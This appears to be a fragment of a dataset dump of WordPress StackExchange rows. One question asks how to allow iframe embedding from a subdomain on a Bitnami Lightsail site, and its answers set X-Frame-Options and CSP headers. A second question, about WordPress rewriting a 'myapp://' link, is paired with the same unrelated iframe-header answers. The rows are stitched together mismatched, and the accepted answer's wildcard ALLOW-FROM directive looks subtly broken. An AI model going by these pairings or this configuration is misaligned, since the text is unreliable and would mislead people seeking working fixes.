Header set Content-Security-Policy "frame-ancestors 'self' https: *.example.com"
Header set Referrer-Policy "strict-origin-when-cross-origin"
</code></pre>
<p>But the headers don't seem to updating or allowing any iframe embeds. I'm not very well-versed on HTTP Headers so apologies if this is a rather silly question.</p>
<p>Thanks!</p>
| [
{
"answer_id": 378840,
"author": "xuan hung Nguyen",
"author_id": 195040,
"author_profile": "https://wordpress.stackexchange.com/users/195040",
"pm_score": -1,
"selected": false,
"text": "<p>In your case, I think you should use this code in htaccess file to allow Iframe can load with the same origin:</p>\n<pre><code>X-Frame-Options: SAMEORIGIN\n</code></pre>\n<p>For more information you can view on this URL: <a href=\"https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options\" rel=\"nofollow noreferrer\">https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options</a></p>\n<p>Hope can help you finsihed this problem.</p>\n"
},
{
"answer_id": 378889,
"author": "nbz",
"author_id": 198091,
"author_profile": "https://wordpress.stackexchange.com/users/198091",
"pm_score": 2,
"selected": true,
"text": "<p>I was able to figure out that because Lightsail uses a Bitnami deployment of Wordpress, Bitnami overrides the <code>.htaccess</code> file.</p>\n<p>Instead you have to update the <code>/opt/bitnami/apache2/conf/httpd.conf</code> file by adding the following content:</p>\n<pre><code><IfModule headers_module>\n <IfVersion >= 2.4.7 >\n Header always setifempty X-Frame-Options ALLOW-FROM https://*.example.com\n </IfVersion>\n <IfVersion < 2.4.7 >\n Header always merge X-Frame-Options ALLOW-FROM https://*example.com\n </IfVersion>\n</IfModule>\n</code></pre>\n<p>Reference:\n<a href=\"https://docs.bitnami.com/bch/apps/livehelperchat/configuration/enable-framing/\" rel=\"nofollow noreferrer\">https://docs.bitnami.com/bch/apps/livehelperchat/configuration/enable-framing/</a></p>\n"
}
] | 2020/11/25 | [
"https://wordpress.stackexchange.com/questions/378819",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/198091/"
] | I have a Wordpress site hosted on LightSail (which uses bitnami). The domain is `https://example.com`
On a subdomain `https://sub.example.com` I have another server running. On this server, I want to embed a page from the main domain `https://example.com/a-page`. Currently, I am getting errors that permission is denied.
I have updated the htaccess file like so:
```
Header set X-Frame-Options "ALLOW-FROM https://*.example.com"
Header set Content-Security-Policy "frame-ancestors 'self' https: *.example.com"
Header set Referrer-Policy "strict-origin-when-cross-origin"
```
But the headers don't seem to updating or allowing any iframe embeds. I'm not very well-versed on HTTP Headers so apologies if this is a rather silly question.
Thanks! | I was able to figure out that because Lightsail uses a Bitnami deployment of Wordpress, Bitnami overrides the `.htaccess` file.
Instead you have to update the `/opt/bitnami/apache2/conf/httpd.conf` file by adding the following content:
```
<IfModule headers_module>
<IfVersion >= 2.4.7 >
Header always setifempty X-Frame-Options ALLOW-FROM https://*.example.com
</IfVersion>
<IfVersion < 2.4.7 >
Header always merge X-Frame-Options ALLOW-FROM https://*example.com
</IfVersion>
</IfModule>
```
Reference:
<https://docs.bitnami.com/bch/apps/livehelperchat/configuration/enable-framing/> |
378,820 | <p>I have a page that only users of my native iOS app will find, which should open the app. This works (on any other HTML page anyway) by linking to "myapp://path/inside/app".</p>
<p>Wordpress keeps "fixing" this to "https://path/inside/app", which doesn't work of course. I didn't find a setting to stop it from doing this.
Is this possible?</p>
| [
{
"answer_id": 378840,
"author": "xuan hung Nguyen",
"author_id": 195040,
"author_profile": "https://wordpress.stackexchange.com/users/195040",
"pm_score": -1,
"selected": false,
"text": "<p>In your case, I think you should use this code in htaccess file to allow Iframe can load with the same origin:</p>\n<pre><code>X-Frame-Options: SAMEORIGIN\n</code></pre>\n<p>For more information you can view on this URL: <a href=\"https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options\" rel=\"nofollow noreferrer\">https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options</a></p>\n<p>Hope can help you finsihed this problem.</p>\n"
},
{
"answer_id": 378889,
"author": "nbz",
"author_id": 198091,
"author_profile": "https://wordpress.stackexchange.com/users/198091",
"pm_score": 2,
"selected": true,
"text": "<p>I was able to figure out that because Lightsail uses a Bitnami deployment of Wordpress, Bitnami overrides the <code>.htaccess</code> file.</p>\n<p>Instead you have to update the <code>/opt/bitnami/apache2/conf/httpd.conf</code> file by adding the following content:</p>\n<pre><code><IfModule headers_module>\n <IfVersion >= 2.4.7 >\n Header always setifempty X-Frame-Options ALLOW-FROM https://*.example.com\n </IfVersion>\n <IfVersion < 2.4.7 >\n Header always merge X-Frame-Options ALLOW-FROM https://*example.com\n </IfVersion>\n</IfModule>\n</code></pre>\n<p>Reference:\n<a href=\"https://docs.bitnami.com/bch/apps/livehelperchat/configuration/enable-framing/\" rel=\"nofollow noreferrer\">https://docs.bitnami.com/bch/apps/livehelperchat/configuration/enable-framing/</a></p>\n"
}
] | 2020/11/25 | [
"https://wordpress.stackexchange.com/questions/378820",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/198093/"
] | I have a page that only users of my native iOS app will find, which should open the app. This works (on any other HTML page anyway) by linking to "myapp://path/inside/app".
Wordpress keeps "fixing" this to "https://path/inside/app", which doesn't work of course. I didn't find a setting to stop it from doing this.
Is this possible? | I was able to figure out that because Lightsail uses a Bitnami deployment of Wordpress, Bitnami overrides the `.htaccess` file.
Instead you have to update the `/opt/bitnami/apache2/conf/httpd.conf` file by adding the following content:
```
<IfModule headers_module>
<IfVersion >= 2.4.7 >
Header always setifempty X-Frame-Options ALLOW-FROM https://*.example.com
</IfVersion>
<IfVersion < 2.4.7 >
Header always merge X-Frame-Options ALLOW-FROM https://*example.com
</IfVersion>
</IfModule>
```
Reference:
<https://docs.bitnami.com/bch/apps/livehelperchat/configuration/enable-framing/> |
Subsets and Splits